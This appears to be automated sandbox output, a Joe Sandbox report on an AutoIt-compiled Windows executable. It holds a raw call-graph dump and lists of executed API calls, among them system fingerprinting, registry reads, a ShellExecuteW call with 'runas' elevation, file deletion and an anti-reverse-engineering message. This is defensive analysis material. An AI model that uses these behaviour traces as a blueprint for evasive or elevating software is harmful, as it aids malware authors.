104351 a26634 FreeLibrary 104350->104351 104351->104348 104353 a4017b 8 API calls 104352->104353 104354 a26735 104353->104354 104355 a2423c 8 API calls 104354->104355 104357 a26741 __fread_nolock 104355->104357 104356 a656c2 104434 a93a92 74 API calls 104356->104434 104357->104356 104361 a2677c 104357->104361 104433 a93a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 104357->104433 104360 a2684a 40 API calls 104360->104361 104361->104360 104362 a65706 104361->104362 104364 a26874 64 API calls 104361->104364 104365 a26810 ISource 104361->104365 104428 a26874 104362->104428 104364->104361 104365->104178 104369 a2685c 104368->104369 104371 a65760 104368->104371 104466 a4ec34 104369->104466 104373 a932bd 104568 a9310d 104373->104568 104377 a4e8a6 ___DestructExceptionObject 104376->104377 104378 a4e8b4 104377->104378 104380 a4e8e4 104377->104380 104401 a4f649 20 API calls __dosmaperr 104378->104401 104382 a4e8f6 104380->104382 104383 a4e8e9 104380->104383 104381 a4e8b9 104402 a52b5c 26 API calls pre_c_initialization 104381->104402 104393 a583e1 104382->104393 104403 a4f649 20 API calls __dosmaperr 104383->104403 104387 a4e8ff 104388 a4e905 104387->104388 104389 a4e912 104387->104389 104404 a4f649 20 API calls __dosmaperr 104388->104404 104405 a4e944 LeaveCriticalSection __fread_nolock 104389->104405 104390 a4e8c4 __fread_nolock 104390->104346 104394 a583ed ___DestructExceptionObject 104393->104394 104406 a532d1 EnterCriticalSection 104394->104406 104396 a583fb 104407 a5847b 104396->104407 104400 a5842c __fread_nolock 104400->104387 104401->104381 104402->104390 104403->104390 104404->104390 104405->104390 104406->104396 104414 a5849e 104407->104414 104408 a584f7 104409 a54ff0 pair 20 API calls 104408->104409 104410 a58500 104409->104410 104412 a52d38 _free 20 API calls 104410->104412 104413 a58509 104412->104413 104415 a58408 104413->104415 104425 a53778 11 API calls 2 library calls 104413->104425 104414->104408 104414->104415 104423 a494fd EnterCriticalSection 104414->104423 104424 a49511 LeaveCriticalSection 104414->104424 104420 a58437 104415->104420 104417 a58528 104426 a494fd EnterCriticalSection 104417->104426 104427 a53319 LeaveCriticalSection 104420->104427 104422 a5843e 104422->104400 104423->104414 104424->104414 104425->104417 104426->104415 104427->104422 104429 a26883 104428->104429 104430 a65780 104428->104430 104435 a4f053 104429->104435 104433->104356 104434->104361 104438 a4ee1a 104435->104438 104440 a4ee26 ___DestructExceptionObject 104438->104440 104439 a4ee32 104463 a4f649 20 API calls __dosmaperr 104439->104463 104440->104439 104441 a4ee58 104440->104441 104451 a494fd EnterCriticalSection 104441->104451 104446 a4ee64 104451->104446 104469 a4ec51 104466->104469 104468 a2686d 104468->104373 104470 a4ec5d ___DestructExceptionObject 104469->104470 104471 a4ec70 ___scrt_fastfail 104470->104471 104472 a4ec9d 104470->104472 104473 a4ec95 __fread_nolock 104470->104473 104496 a4f649 20 API calls __dosmaperr 104471->104496 104482 a494fd EnterCriticalSection 104472->104482 104473->104468 104476 a4eca7 104483 a4ea68 104476->104483 104478 a4ec8a 104497 a52b5c 26 API calls pre_c_initialization 104478->104497 104482->104476 104484 a4ea7a ___scrt_fastfail 104483->104484 104489 a4ea97 104483->104489 104485 a4ea87 104484->104485 104484->104489 104494 a4eada __fread_nolock 104484->104494 104564 a4f649 20 API calls __dosmaperr 104485->104564 104498 a4ecdc LeaveCriticalSection __fread_nolock 104489->104498 104490 a4ebf6 ___scrt_fastfail 104492 a4dcc5 __fread_nolock 26 API calls 104492->104494 104494->104489 104494->104490 104494->104492 104499 a590c5 104494->104499 104566 a4d2e8 26 API calls 4 library calls 104494->104566 104496->104478 104497->104473 104498->104473 104500 a590d7 104499->104500 104501 a590ef 104499->104501 104566->104494 104571 a4e858 104568->104571 104574 a4e7d9 104571->104574 104575 a4e7fc 104574->104575 104576 a4e7e8 104574->104576 104582 a4f649 20 API calls __dosmaperr 104576->104582 104734->104057 104735 a21033 104740 a268b4 104735->104740 104739 a21042 104741 a2bf73 8 API calls 104740->104741 104742 a26922 104741->104742 104748 a2589f 104742->104748 104745 a269bf 104746 a21038 104745->104746 104751 a26b14 8 API calls __fread_nolock 104745->104751 104747 a40413 29 API calls __onexit 104746->104747 104747->104739 104752 a258cb 104748->104752 104751->104745 104753 a258be 104752->104753 104754 a258d8 104752->104754 104753->104745 104754->104753 104755 a258df RegOpenKeyExW 104754->104755 104755->104753 104756 a258f9 RegQueryValueExW 104755->104756 104757 a2591a 104756->104757 104758 a2592f RegCloseKey 104756->104758 104757->104758 104758->104753 105471 a76555 105472 a4014b 8 API calls 105471->105472 105473 a7655c 105472->105473 105474 a4017b 8 API calls 105473->105474 105476 a76575 __fread_nolock 105473->105476 105474->105476 105475 a4017b 8 API calls 105477 a7659a 105475->105477 105476->105475 104759 a236f5 104762 a2370f 104759->104762 104763 a23726 104762->104763 104764 a2378a 104763->104764 104765 a2372b 104763->104765 104802 a23788 104763->104802 104767 a63df4 104764->104767 104768 a23790 104764->104768 104769 a23804 PostQuitMessage 104765->104769 104770 a23738 104765->104770 104766 a2376f DefWindowProcW 104804 a23709 104766->104804 104817 a22f92 10 API calls 104767->104817 104771 a23797 104768->104771 104772 a237bc SetTimer RegisterWindowMessageW 104768->104772 104769->104804 104773 a23743 104770->104773 104774 a63e61 104770->104774 104776 a237a0 KillTimer 104771->104776 104777 a63d95 104771->104777 104778 a237e5 CreatePopupMenu 104772->104778 104772->104804 104779 a2380e 104773->104779 104780 a2374d 104773->104780 104820 a8c8f7 65 API calls ___scrt_fastfail 104774->104820 104787 a23907 Shell_NotifyIconW 104776->104787 104785 a63dd0 MoveWindow 104777->104785 104786 a63d9a 104777->104786 104778->104804 104807 a3fcad 104779->104807 104788 a63e46 104780->104788 104789 a23758 104780->104789 104782 a63e15 104818 a3f23c 40 API calls 104782->104818 104785->104804 104791 a63da0 104786->104791 104792 a63dbf SetFocus 104786->104792 104793 a237b3 104787->104793 104788->104766 104819 a81423 8 API calls 104788->104819 104794 a237f2 104789->104794 104800 a23763 104789->104800 104790 a63e73 104790->104766 104790->104804 104795 a63da9 104791->104795 104791->104800 104792->104804 104814 a259ff DeleteObject DestroyWindow 104793->104814 104815 a2381f 75 API calls ___scrt_fastfail 104794->104815 104816 a22f92 10 API calls 104795->104816 104799 a23802 104799->104804 104800->104766 104803 a23907 Shell_NotifyIconW 104800->104803 104802->104766 104805 a63e3a 104803->104805 104806 a2396b 60 API calls 104805->104806 104806->104802 104808 a3fcc5 ___scrt_fastfail 104807->104808 104809 a3fd4b 104807->104809 104810 a261a9 55 API calls 104808->104810 104809->104804 104812 a3fcec 104810->104812 104811 a3fd34 KillTimer SetTimer 104811->104809 104812->104811 104813 a7fe2b Shell_NotifyIconW 104812->104813 104813->104811 104814->104804 104815->104799 104816->104804 104817->104782 104818->104800 104819->104802 104820->104790 105478 a75650 105487 a3e3d5 105478->105487 105480 a75666 105483 a756e1 105480->105483 105496 a3aa65 9 API calls 105480->105496 105482 a756c1 105482->105483 105497 a9247e 8 API calls 105482->105497 105486 a761d7 105483->105486 105498 a93fe1 81 API calls __wsopen_s 105483->105498 105488 a3e3e3 105487->105488 105489 a3e3f6 105487->105489 105499 a2b4c8 8 API calls 105488->105499 105491 a3e3fb 105489->105491 105492 a3e429 105489->105492 105493 a4014b 8 API calls 105491->105493 105500 a2b4c8 8 API calls 105492->105500 105495 a3e3ed 105493->105495 105495->105480 105496->105482 105497->105483 105498->105486 105499->105495 105500->105495 105501 a2105b 105506 a252a7 105501->105506 105503 a2106a 105537 a40413 29 API calls __onexit 105503->105537 105505 a21074 105507 a252b7 __wsopen_s 105506->105507 105508 a2bf73 8 API calls 105507->105508 105509 a2536d 105508->105509 105510 a25594 10 API calls 105509->105510 105511 a25376 105510->105511 105538 a25238 105511->105538 105514 a26b7c 8 API calls 105515 a2538f 105514->105515 105516 a26a7c 8 API calls 105515->105516 105517 a2539e 105516->105517 105518 a2bf73 8 API calls 105517->105518 105519 a253a7 105518->105519 105520 a2bd57 8 API calls 105519->105520 105521 a253b0 RegOpenKeyExW 105520->105521 105522 a64be6 RegQueryValueExW 105521->105522 105527 a253d2 105521->105527 105523 a64c03 105522->105523 105524 a64c7c RegCloseKey 105522->105524 105525 a4017b 8 API calls 105523->105525 105524->105527 105536 a64c8e _wcslen 105524->105536 105526 a64c1c 105525->105526 105528 a2423c 8 API calls 105526->105528 105527->105503 105529 a64c27 RegQueryValueExW 105528->105529 105531 a64c44 105529->105531 105533 a64c5e ISource 105529->105533 105530 a2655e 8 API calls 105530->105536 105532 a28577 8 API calls 105531->105532 105532->105533 105533->105524 105534 a2b329 8 API calls 105534->105536 105535 a26a7c 8 API calls 105535->105536 105536->105527 105536->105530 105536->105534 105536->105535 105537->105505 105539 a622d0 __wsopen_s 105538->105539 105540 a25245 GetFullPathNameW 105539->105540 105541 a25267 105540->105541 105542 a28577 8 API calls 105541->105542 105543 a25285 105542->105543 105543->105514 105544 a21098 105549 a25fc8 105544->105549 105548 a210a7 105550 a2bf73 8 API calls 105549->105550 105551 a25fdf GetVersionExW 105550->105551 105552 a28577 8 API calls 105551->105552 105553 a2602c 105552->105553 105554 a2adf4 8 API calls 105553->105554 105566 a26062 105553->105566 105555 a26056 105554->105555 105557 a255dc 8 API calls 105555->105557 105556 a2611c GetCurrentProcess IsWow64Process 105558 a26138 105556->105558 105557->105566 105559 a26150 LoadLibraryA 105558->105559 105560 a65269 GetSystemInfo 105558->105560 105561 a26161 GetProcAddress 105559->105561 105562 a2619d GetSystemInfo 105559->105562 105561->105562 105564 a26171 GetNativeSystemInfo 105561->105564 105565 a26177 105562->105565 105563 a65224 105564->105565 105567 a2109d 105565->105567 105568 a2617b FreeLibrary 105565->105568 105566->105556 105566->105563 105569 a40413 29 API calls __onexit 105567->105569 105568->105567 105569->105548 104821 a30ebf 104822 a30ed3 104821->104822 104828 a31425 104821->104828 104823 a30ee5 104822->104823 104826 a4014b 8 API calls 104822->104826 104824 a7562c 104823->104824 104827 a30f3e 104823->104827 104854 a2b4c8 8 API calls 104823->104854 104855 a91b14 8 API calls 104824->104855 104826->104823 104829 a32b20 207 API calls 104827->104829 104834 a3049d ISource 104827->104834 104828->104823 104831 a2bed9 8 API calls 104828->104831 104853 a30376 ISource 104829->104853 104831->104823 104832 a4014b 8 API calls 104832->104853 104833 a7632b 104859 a93fe1 81 API calls __wsopen_s 104833->104859 104835 a31e50 40 API calls 104835->104853 104836 a31695 104836->104834 104841 a2bed9 8 API calls 104836->104841 104838 a7625a 104858 a93fe1 81 API calls __wsopen_s 104838->104858 104839 a2bed9 8 API calls 104839->104853 104840 a75cdb 104840->104834 104845 a2bed9 8 API calls 104840->104845 104841->104834 104844 a31990 207 API calls 104844->104853 104845->104834 104846 a2bf73 8 API calls 104846->104853 104847 a40413 29 API calls pre_c_initialization 104847->104853 104848 a405b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 104848->104853 104849 a76115 104856 a93fe1 81 API calls __wsopen_s 104849->104856 104850 a30aae ISource 104857 a93fe1 81 API calls __wsopen_s 104850->104857 104851 a40568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 104851->104853 104853->104832 104853->104833 104853->104834 104853->104835 104853->104836 104853->104838 104853->104839 104853->104840 104853->104844 104853->104846 104853->104847 104853->104848 104853->104849 104853->104850 104853->104851 104854->104823 104855->104834 104856->104850 104857->104834 104858->104834 104859->104834 105570 a2f4dc 105571 a2cab0 207 API calls 105570->105571 105572 a2f4ea 105571->105572 104860 a5947a 104861 a59487 104860->104861 104865 a5949f 104860->104865 104910 a4f649 20 API calls __dosmaperr 104861->104910 104863 a5948c 104911 a52b5c 26 API calls pre_c_initialization 104863->104911 104866 a594fa 104865->104866 104872 a59497 104865->104872 104912 a60144 21 API calls 2 library calls 104865->104912 104868 a4dcc5 __fread_nolock 26 API calls 104866->104868 104869 a59512 104868->104869 104880 a58fb2 104869->104880 104871 a59519 104871->104872 104873 a4dcc5 __fread_nolock 26 API calls 104871->104873 104874 a59545 104873->104874 104874->104872 104875 a4dcc5 __fread_nolock 26 API calls 104874->104875 104876 a59553 104875->104876 104876->104872 104877 a4dcc5 __fread_nolock 26 API calls 104876->104877 104878 a59563 104877->104878 104879 a4dcc5 __fread_nolock 26 API calls 104878->104879 104879->104872 104881 a58fbe ___DestructExceptionObject 104880->104881 104882 a58fc6 104881->104882 104883 a58fde 104881->104883 104914 a4f636 20 API calls __dosmaperr 104882->104914 104885 a590a4 104883->104885 104888 a59017 104883->104888 104921 a4f636 20 API calls __dosmaperr 104885->104921 104887 a58fcb 104915 a4f649 20 API calls __dosmaperr 104887->104915 104891 a59026 104888->104891 104892 a5903b 104888->104892 104889 a590a9 104922 a4f649 20 API calls __dosmaperr 104889->104922 104916 a4f636 20 API calls __dosmaperr 104891->104916 104913 a554ba EnterCriticalSection 104892->104913 104896 a59033 104923 a52b5c 26 API calls pre_c_initialization 104896->104923 104897 a5902b 104917 a4f649 20 API calls __dosmaperr 104897->104917 104898 a59041 104900 a59072 104898->104900 104901 a5905d 104898->104901 104905 a590c5 __fread_nolock 38 API calls 104900->104905 104918 a4f649 20 API calls __dosmaperr 104901->104918 104903 a58fd3 __fread_nolock 104903->104871 104906 a5906d 104905->104906 104920 a5909c LeaveCriticalSection __wsopen_s 104906->104920 104907 a59062 104919 a4f636 20 API calls __dosmaperr 104907->104919 104910->104863 104911->104872 104912->104866 104913->104898 104914->104887 104915->104903 104916->104897 104917->104896 104918->104907 104919->104906 104920->104903 104921->104889 104922->104896 104923->104903 104924 a2dd3d 104925 a2dd63 104924->104925 104926 a719c2 104924->104926 104927 a2dead 104925->104927 104930 a4014b 8 API calls 104925->104930 104929 a71a82 104926->104929 104934 a71a26 104926->104934 104937 a71a46 104926->104937 104931 a4017b 8 API calls 104927->104931 104984 a93fe1 81 API calls __wsopen_s 104929->104984 104936 a2dd8d 104930->104936 104943 a2dee4 __fread_nolock 104931->104943 104932 a71a7d 104982 a3e6e8 207 API calls 104934->104982 104938 a4014b 8 API calls 104936->104938 104936->104943 104937->104932 104983 a93fe1 81 API calls __wsopen_s 104937->104983 104940 a2dddb 104938->104940 104939 a4017b 8 API calls 104939->104943 104940->104934 104941 a2de16 104940->104941 104942 a30340 207 API calls 104941->104942 104944 a2de29 104942->104944 104943->104937 104943->104939 104944->104932 104944->104943 104945 a71aa5 104944->104945 104946 a2de77 104944->104946 104948 a2d526 104944->104948 104985 a93fe1 81 API calls __wsopen_s 104945->104985 104946->104927 104946->104948 104949 a4014b 8 API calls 104948->104949 104950 a2d589 104949->104950 104966 a2c32d 104950->104966 104953 a4014b 8 API calls 104958 a2d66e ISource 104953->104958 104954 a2c3ab 8 API calls 104964 a2d9ac ISource 104954->104964 104957 a71f79 104987 a856ae 8 API calls ISource 104957->104987 104958->104957 104959 a71f94 104958->104959 104961 a2bed9 8 API calls 104958->104961 104963 a2d911 ISource 104958->104963 104973 a2c3ab 104958->104973 104986 a2b4c8 8 API calls 104958->104986 104961->104958 104963->104954 104963->104964 104965 a2d9c3 104964->104965 104981 a3e30a 8 API calls ISource 104964->104981 104970 a2c33d 104966->104970 104967 a2c345 104967->104953 104968 a4014b 8 API calls 104968->104970 104969 a2bf73 8 API calls 104969->104970 104970->104967 104970->104968 104970->104969 104971 a2bed9 8 API calls 104970->104971 104972 a2c32d 8 API calls 104970->104972 104971->104970 104972->104970 104974 a2c3e1 ISource 104973->104974 104975 a2c3b9 104973->104975 104974->104958 104976 a2c3ab 8 API calls 104975->104976 104977 a2c3c7 104975->104977 104976->104977 104978 a2c3cd 104977->104978 104979 a2c3ab 8 API calls 104977->104979 104978->104974 104988 a2c7e0 8 API calls ISource 104978->104988 104979->104978 104981->104964 104982->104937 104983->104932 104984->104932 104985->104932 104986->104958 104987->104959 104988->104974 105573 a3235c 105574 a32365 __fread_nolock 105573->105574 105575 a28ec0 52 API calls 105574->105575 105576 a774e3 105574->105576 105579 a323b6 105574->105579 105580 a4014b 8 API calls 105574->105580 105583 a31ff7 __fread_nolock 105574->105583 105584 a4017b 8 API calls 105574->105584 105575->105574 105585 a813c8 8 API calls __fread_nolock 105576->105585 105578 a774ef 105582 a2bed9 8 API calls 105578->105582 105578->105583 105581 a27d74 8 API calls 105579->105581 105580->105574 105581->105583 105582->105583 105584->105574 105585->105578

                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                Function 00A25FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236libraryloaderCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 234 a25fc8-a26037 call a2bf73 GetVersionExW call a28577 239 a6507d-a65090 234->239 240 a2603d 234->240 242 a65091-a65095 239->242 241 a2603f-a26041 240->241 243 a26047-a260a6 call a2adf4 call a255dc 241->243 244 a650bc 241->244 245 a65097 242->245 246 a65098-a650a4 242->246 259 a65224-a6522b 243->259 260 a260ac-a260ae 243->260 250 a650c3-a650cf 244->250 245->246 246->242 247 a650a6-a650a8 246->247 247->241 249 a650ae-a650b5 247->249 249->239 252 a650b7 249->252 253 a2611c-a26136 GetCurrentProcess IsWow64Process 250->253 252->244 255 a26195-a2619b 253->255 256 a26138 253->256 258 a2613e-a2614a 255->258 256->258 261 a26150-a2615f LoadLibraryA 258->261 262 a65269-a6526d GetSystemInfo 258->262 265 a6522d 259->265 266 a6524b-a6524e 259->266 263 a65125-a65138 260->263 264 a260b4-a260b7 260->264 269 a26161-a2616f GetProcAddress 261->269 270 a2619d-a261a7 GetSystemInfo 261->270 272 a65161-a65163 263->272 273 a6513a-a65143 263->273 264->253 274 a260b9-a260f5 264->274 271 a65233 265->271 267 a65250-a6525f 266->267 268 a65239-a65241 266->268 267->271 277 a65261-a65267 267->277 268->266 269->270 278 a26171-a26175 GetNativeSystemInfo 269->278 279 a26177-a26179 270->279 271->268 275 a65165-a6517a 272->275 276 a65198-a6519b 272->276 280 a65145-a6514b 273->280 281 a65150-a6515c 273->281 274->253 282 a260f7-a260fa 274->282 285 a65187-a65193 275->285 286 a6517c-a65182 275->286 287 a651d6-a651d9 276->287 288 a6519d-a651b8 276->288 277->268 278->279 289 a26182-a26194 279->289 290 a2617b-a2617c FreeLibrary 279->290 280->253 281->253 283 a650d4-a650e4 282->283 284 a26100-a2610a 282->284 294 a650e6-a650f2 283->294 295 a650f7-a65101 283->295 284->250 291 a26110-a26116 284->291 285->253 286->253 287->253 296 a651df-a65206 287->296 292 a651c5-a651d1 288->292 293 a651ba-a651c0 288->293 290->289 291->253 292->253 293->253 294->253 297 a65114-a65120 295->297 298 a65103-a6510f 295->298 299 a65213-a6521f 296->299 300 a65208-a6520e 296->300 297->253 298->253 299->253 300->253
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 00A25FF7
                                                                                                                                                                                                                                                                  • Part of subcall function 00A28577: _wcslen.LIBCMT ref: 00A2858A
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00ABDC2C,00000000,?,?), ref: 00A26123
                                                                                                                                                                                                                                                                • IsWow64Process.KERNEL32(00000000,?,?), ref: 00A2612A
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00A26155
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00A26167
                                                                                                                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00A26175
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 00A2617C
                                                                                                                                                                                                                                                                • GetSystemInfo.KERNEL32(?,?,?), ref: 00A261A1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                                                                                                                • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                                                                                                                • API String ID: 3290436268-3101561225
                                                                                                                                                                                                                                                                • Opcode ID: 46c749e8266a03ef597054963b1662e1f68edb9d34edfc51ab329666a47ea32b
                                                                                                                                                                                                                                                                • Instruction ID: 7051dbfacc79dfcdb3e439b6bf476635ab7abb75c2ceb9da25641749afbf1325
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 46c749e8266a03ef597054963b1662e1f68edb9d34edfc51ab329666a47ea32b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8A182B194A2D4DFC716CBFC7C417B57FA46B66300B084BA9D4819F222D23D954AEB32
                                                                                                                                                                                                                                                                Function 00A2338B Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00A23368,?), ref: 00A233BB
                                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00A23368,?), ref: 00A233CE
                                                                                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?,00AF2418,00AF2400,?,?,?,?,?,?,00A23368,?), ref: 00A2343A
                                                                                                                                                                                                                                                                  • Part of subcall function 00A28577: _wcslen.LIBCMT ref: 00A2858A
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00A23462,00AF2418,?,?,?,?,?,?,?,00A23368,?), ref: 00A242A0
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,00000001,00AF2418,?,?,?,?,?,?,?,00A23368,?), ref: 00A234BB
                                                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00A63CB0
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,00AF2418,?,?,?,?,?,?,?,00A23368,?), ref: 00A63CF1
                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00AE31F4,00AF2418,?,?,?,?,?,?,?,00A23368), ref: 00A63D7A
                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(00000000,?,?), ref: 00A63D81
                                                                                                                                                                                                                                                                  • Part of subcall function 00A234D3: GetSysColorBrush.USER32(0000000F), ref: 00A234DE
                                                                                                                                                                                                                                                                  • Part of subcall function 00A234D3: LoadCursorW.USER32(00000000,00007F00), ref: 00A234ED
                                                                                                                                                                                                                                                                  • Part of subcall function 00A234D3: LoadIconW.USER32(00000063), ref: 00A23503
                                                                                                                                                                                                                                                                  • Part of subcall function 00A234D3: LoadIconW.USER32(000000A4), ref: 00A23515
                                                                                                                                                                                                                                                                  • Part of subcall function 00A234D3: LoadIconW.USER32(000000A2), ref: 00A23527
                                                                                                                                                                                                                                                                  • Part of subcall function 00A234D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A2353F
                                                                                                                                                                                                                                                                  • Part of subcall function 00A234D3: RegisterClassExW.USER32(?), ref: 00A23590
                                                                                                                                                                                                                                                                  • Part of subcall function 00A235B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A235E1
                                                                                                                                                                                                                                                                  • Part of subcall function 00A235B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A23602
                                                                                                                                                                                                                                                                  • Part of subcall function 00A235B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00A23368,?), ref: 00A23616
                                                                                                                                                                                                                                                                  • Part of subcall function 00A235B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00A23368,?), ref: 00A2361F
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A23A3C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00A63CAA
                                                                                                                                                                                                                                                                • runas, xrefs: 00A63D75
                                                                                                                                                                                                                                                                • AutoIt, xrefs: 00A63CA5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                                                                                • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                                                                                                                • API String ID: 683915450-2030392706
                                                                                                                                                                                                                                                                • Opcode ID: 65f5ddde570bc45204fd09ea9b52d0c126a2c48e7b753ec9422ba5a0dfff3547
                                                                                                                                                                                                                                                                • Instruction ID: 931688d9d5bc60e9eb97e82f395bb423598c7794a1c26d8a9eba814582dcbbdc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65f5ddde570bc45204fd09ea9b52d0c126a2c48e7b753ec9422ba5a0dfff3547
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7511B32148355AECB05FFE8AD41EBE7BB8AF95741F00093CF581561A3DB648A4BD722
                                                                                                                                                                                                                                                                Function 00A8DC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A25851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A255D1,?,?,00A64B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A25871
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8EAB0: GetFileAttributesW.KERNEL32(?,00A8D840), ref: 00A8EAB1
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00A8DCCB
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 00A8DD1B
                                                                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00A8DD2C
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00A8DD43
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00A8DD4C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
